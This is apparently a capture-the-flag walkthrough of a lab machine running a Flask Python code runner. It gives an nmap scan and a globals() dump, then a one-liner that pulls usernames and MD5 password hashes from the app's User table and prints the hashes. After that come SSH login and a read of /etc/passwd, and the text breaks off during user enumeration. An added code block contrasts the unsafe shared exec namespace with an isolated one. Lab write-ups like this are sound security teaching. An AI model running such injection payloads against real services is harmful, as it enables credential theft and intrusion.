Pwned screenshot (figureti):

First we run a port scan:
# Nmap 7.94SVN scan initiated Sat Mar 22 16:09:17 2025 as: nmap -Pn -n --disable-arp-ping -p- -sV --min-rate 3000 --open -vvv -oN puertos.txt 10.10.11.62
Nmap scan report for 10.10.11.62
Host is up, received user-set (0.20s latency).
Scanned at 2025-03-22 16:09:17 -05 for 34s
Not shown: 64026 closed tcp ports (conn-refused), 1507 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
5000/tcp open http syn-ack Gunicorn 20.0.4
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 22 16:09:51 2025 -- 1 IP address (1 host up) scanned in 33.99 seconds
Web:

At first glance we can see that it is a section for running Python code.
If we look through the other sections we find the usual and nothing particularly relevant, so we will focus on the code section. First I will look at the module namespace dictionary with globals() and the current namespace dictionary with locals():

{'__name__': 'app', '__doc__': None, '__package__': '', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fe6d56486d0>,
'__spec__': ModuleSpec(name='app', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fe6d56486d0>,
origin='/home/app-production/app/app.py'), '__file__': '/home/app-production/app/app.py',
'__cached__': '/home/app-production/app/__pycache__/app.cpython-38.pyc', '__builtins__': {'__name__': 'builtins',
'__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.",
'__package__': '', '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': ModuleSpec(name='builtins',
loader=<class '_frozen_importlib.BuiltinImporter'>), '__build_class__': <built-in function __build_class__>, '__import__':
<built-in function __import__>, 'abs': <built-in function abs>, 'all': <built-in function all>, 'any': <built-in function any>,
'ascii': <built-in function ascii>, 'bin': <built-in function bin>,
'breakpoint': <built-in function breakpoint>,
'callable': <built-in function callable>,
'chr': <built-in function chr>,
'compile': <built-in function compile>,
'delattr': <built-in function delattr>,
'dir': <built-in function dir>, 'divmod': <built-in function divmod>,
'eval': <built-in function eval>, 'exec': <built-in function exec>,
'format': <built-in function format>, 'getattr': <built-in function getattr>
, 'globals': <built-in function globals>, 'hasattr': <built-in function hasattr>,
'hash': <built-in function hash>, 'hex': <built-in function hex>,
'id': <built-in function id>, 'input': <built-in function input>,
'isinstance': <built-in function isinstance>, 'issubclass': <built-in function issubclass>, 'iter': <built-in function iter>, 'len': <built-in function len>, 'locals': <built-in function locals>, 'max': <built-in function max>, 'min': <built-in function min>, 'next': <built-in function next>, 'oct': <built-in function oct>, 'ord': <built-in function ord>, 'pow': <built-in function pow>, 'print': <built-in function print>, 'repr': <built-in function repr>, 'round': <built-in function round>, 'setattr': <built-in function setattr>, 'sorted': <built-in function sorted>, 'sum': <built-in function sum>, 'vars': <built-in function vars>, 'None': None, 'Ellipsis': Ellipsis, 'NotImplemented': NotImplemented, 'False': False, 'True': True, 'bool': <class 'bool'>, 'memoryview': <class 'memoryview'>, 'bytearray': <class 'bytearray'>, 'bytes': <class 'bytes'>, 'classmethod': <class 'classmethod'>, 'complex': <class 'complex'>, 'dict': <class 'dict'>, 'enumerate': <class 'enumerate'>, 'filter': <class 'filter'>, 'float': <class 'float'>, 'frozenset': <class 'frozenset'>, 'property': <class 'property'>, 'int': <class 'int'>, 'list': <class 'list'>, 'map': <class 'map'>, 'object': <class 'object'>, 'range': <class 'range'>, 'reversed': <class 'reversed'>, 'set': <class 'set'>, 'slice': <class 'slice'>, 'staticmethod': <class 'staticmethod'>, 'str': <class 'str'>, 'super': <class 'super'>, 'tuple': <class 'tuple'>, 'type': <class 'type'>, 'zip': <class 'zip'>, '__debug__': True, 'BaseException': <class 'BaseException'>, 'Exception': <class 'Exception'>, 'TypeError': <class 'TypeError'>, 'StopAsyncIteration': <class 'StopAsyncIteration'>, 'StopIteration': <class 'StopIteration'>, 'GeneratorExit': <class 'GeneratorExit'>, 'SystemExit': <class 'SystemExit'>, 'KeyboardInterrupt': <class 'KeyboardInterrupt'>, 'ImportError': <class 'ImportError'>, 'ModuleNotFoundError': <class 'ModuleNotFoundError'>, 'OSError': <class 'OSError'>, 'EnvironmentError': <class 'OSError'>, 'IOError': <class 
'OSError'>, 'EOFError': <class 'EOFError'>, 'RuntimeError': <class 'RuntimeError'>, 'RecursionError': <class 'RecursionError'>, 'NotImplementedError': <class 'NotImplementedError'>, 'NameError': <class 'NameError'>, 'UnboundLocalError': <class 'UnboundLocalError'>, 'AttributeError': <class 'AttributeError'>, 'SyntaxError': <class 'SyntaxError'>, 'IndentationError': <class 'IndentationError'>, 'TabError': <class 'TabError'>, 'LookupError': <class 'LookupError'>, 'IndexError': <class 'IndexError'>, 'KeyError': <class 'KeyError'>, 'ValueError': <class 'ValueError'>, 'UnicodeError': <class 'UnicodeError'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'UnicodeDecodeError': <class 'UnicodeDecodeError'>, 'UnicodeTranslateError': <class 'UnicodeTranslateError'>, 'AssertionError': <class 'AssertionError'>, 'ArithmeticError': <class 'ArithmeticError'>, 'FloatingPointError': <class 'FloatingPointError'>, 'OverflowError': <class 'OverflowError'>, 'ZeroDivisionError': <class 'ZeroDivisionError'>, 'SystemError': <class 'SystemError'>, 'ReferenceError': <class 'ReferenceError'>, 'MemoryError': <class 'MemoryError'>, 'BufferError': <class 'BufferError'>, 'Warning': <class 'Warning'>, 'UserWarning': <class 'UserWarning'>, 'DeprecationWarning': <class 'DeprecationWarning'>, 'PendingDeprecationWarning': <class 'PendingDeprecationWarning'>, 'SyntaxWarning': <class 'SyntaxWarning'>, 'RuntimeWarning': <class 'RuntimeWarning'>, 'FutureWarning': <class 'FutureWarning'>, 'ImportWarning': <class 'ImportWarning'>, 'UnicodeWarning': <class 'UnicodeWarning'>, 'BytesWarning': <class 'BytesWarning'>, 'ResourceWarning': <class 'ResourceWarning'>, 'ConnectionError': <class 'ConnectionError'>, 'BlockingIOError': <class 'BlockingIOError'>, 'BrokenPipeError': <class 'BrokenPipeError'>, 'ChildProcessError': <class 'ChildProcessError'>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ConnectionRefusedError': <class 'ConnectionRefusedError'>, 'ConnectionResetError': <class 
'ConnectionResetError'>, 'FileExistsError': <class 'FileExistsError'>, 'FileNotFoundError': <class 'FileNotFoundError'>, 'IsADirectoryError': <class 'IsADirectoryError'>, 'NotADirectoryError': <class 'NotADirectoryError'>, 'InterruptedError': <class 'InterruptedError'>, 'PermissionError': <class 'PermissionError'>, 'ProcessLookupError': <class 'ProcessLookupError'>, 'TimeoutError': <class 'TimeoutError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2021 Python Software Foundation. All Rights Reserved. Copyright (c) 2000 BeOpen.com. All Rights Reserved. Copyright (c) 1995-2001 Corporation for National Research Initiatives. All Rights Reserved. Copyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam. All Rights Reserved., 'credits': Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands for supporting Python development. See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.}, 'Flask': <class 'flask.app.Flask'>, 'render_template': <function render_template at 0x7fe6d5007ee0>, 'render_template_string': <function render_template_string at 0x7fe6d5007f70>, 'request': <Request 'http://10.10.11.62:5000/run_code' [POST]>, 'jsonify': <function jsonify at 0x7fe6d52b1c10>, 'redirect': <function redirect at 0x7fe6d511a3a0>, 'url_for': <function url_for at 0x7fe6d511a310>, 'session': <SecureCookieSession {'_flashes': [('message', 'Registration successful! You can now log in.'), ('message', 'Login successful!'), ('message', 'You do not have permission to view this code.'), ('message', 'You have been logged out.'), ('message', 'Registration successful! 
You can now log in.'), ('message', 'Login successful!'), ('message', 'You have been logged out.')]}>, 'flash': <function flash at 0x7fe6d511a550>, 'SQLAlchemy': <class 'flask_sqlalchemy.extension.SQLAlchemy'>, 'sys': <module 'sys' (built-in)>, 'io': <module 'io' from '/usr/lib/python3.8/io.py'>, 'os': <module 'os' from '/usr/lib/python3.8/os.py'>, 'hashlib': <module 'hashlib' from '/usr/lib/python3.8/hashlib.py'>, 'app': <Flask 'app'>, 'db': <SQLAlchemy sqlite:////home/app-production/app/instance/database.db>, 'User': <class 'app.User'>, 'Code': <class 'app.Code'>, 'index': <function index at 0x7fe6d40558b0>, 'register': <function register at 0x7fe6d4055b80>, 'login': <function login at 0x7fe6d4055c10>, 'logout': <function logout at 0x7fe6d4055ca0>, 'run_code': <function run_code at 0x7fe6d4055e50>, 'load_code': <function load_code at 0x7fe6d3ed0040>, 'save_code': <function save_code at 0x7fe6d3ed01f0>, 'codes': <function codes at 0x7fe6d3ed03a0>, 'about': <function about at 0x7fe6d3ed0550>} {'code': 'print(globals())\nprint(locals())', 'old_stdout': <_io.TextIOWrapper name='<stdout>' mode='w' encoding='utf-8'>, 'redirected_output': <_io.StringIO object at 0x7fe6d3ea5dc0>, 'keyword': '__builtins__'}
We see that there is an object called User, so let's try exploiting it with
print([(user.id, user.username, user.password) for user in User.query.all()])
Which will return the following:
[(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'),
(2, 'martin', '3de6f30c4a09c27fc71932bfc68474be'),
(3, 'pippo', '0c88028bf3aa6a6a143ed846f2be1ea4')]
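The reason that one-liner works is that the code runner exec()s user input inside the app's own module namespace, so a keyword denylist does nothing to hide module objects such as User or db. The following is an added example of mine, not the machine's app code: the User stand-in (an in-memory table) and the denylist are assumptions reconstructed from the globals()/locals() dump above, and it contrasts the shared-namespace pattern with running the same input in a fresh namespace.

```python
import contextlib
import io

# Constructed stand-in for the app's module-level SQLAlchemy `User` model;
# only the `User.query.all()` shape used in the write-up is reproduced.
class User:
    _rows = [(1, "development", "<md5-placeholder>"),
             (2, "martin", "<md5-placeholder>")]

    def __init__(self, id, username, password):
        self.id, self.username, self.password = id, username, password

    class query:
        @staticmethod
        def all():
            return [User(*row) for row in User._rows]

# Assumed denylist, reconstructed from the `'keyword': '__builtins__'` entry
# seen in the locals() dump; the real list is not visible on the page.
BANNED = ["__builtins__", "import", "open", "eval", "exec", "subprocess", "os."]

def blocked(code):
    return any(keyword in code for keyword in BANNED)

def run_code_shared(code):
    """Weak pattern: denylist, then exec() with no namespace argument, so the
    submitted code runs in this module's globals and can reach `User`."""
    if blocked(code):
        return "Use of restricted keywords is not allowed."
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        exec(code)
    return buf.getvalue()

def run_code_isolated(code):
    """Mitigation: same denylist, but a fresh namespace with a minimal builtins
    table; module objects are undefined. Still not a sandbox: untrusted code
    belongs in a separate process or container."""
    if blocked(code):
        return "Use of restricted keywords is not allowed."
    buf = io.StringIO()
    try:
        with contextlib.redirect_stdout(buf):
            exec(code, {"__builtins__": {"print": print}}, {})
    except NameError as exc:
        return f"NameError: {exc}"
    return buf.getvalue()

# The exact statement the write-up submitted to the code runner.
DUMP = "print([(u.id, u.username, u.password) for u in User.query.all()])"
```

Calling run_code_shared(DUMP) prints the table rows, while run_code_isolated(DUMP) fails with a NameError because User is simply not defined in the namespace the input runs in.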
If we crack the passwords we get:

We will try the possible usernames and passwords in order against the SSH service, and the user martin turns out to be the successful one.
On our first listing we don't find what we are looking for (the user flag), so let's enumerate possible users; this can be done in two ways, by looking at the /home directory or at /etc/passwd:
martin@code:/home$ cat /etc/passwd | grep "/home"
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
app-production:x:1001:1001:,,,:/home/app-production:/bin/bash
martin:x:1000:1000:,,,:/home/martin:/bin/bash
martin@code:/home$ ls
app-production martin
martin@code:/home$
We find the user app-production, very likely the owner of user.txt.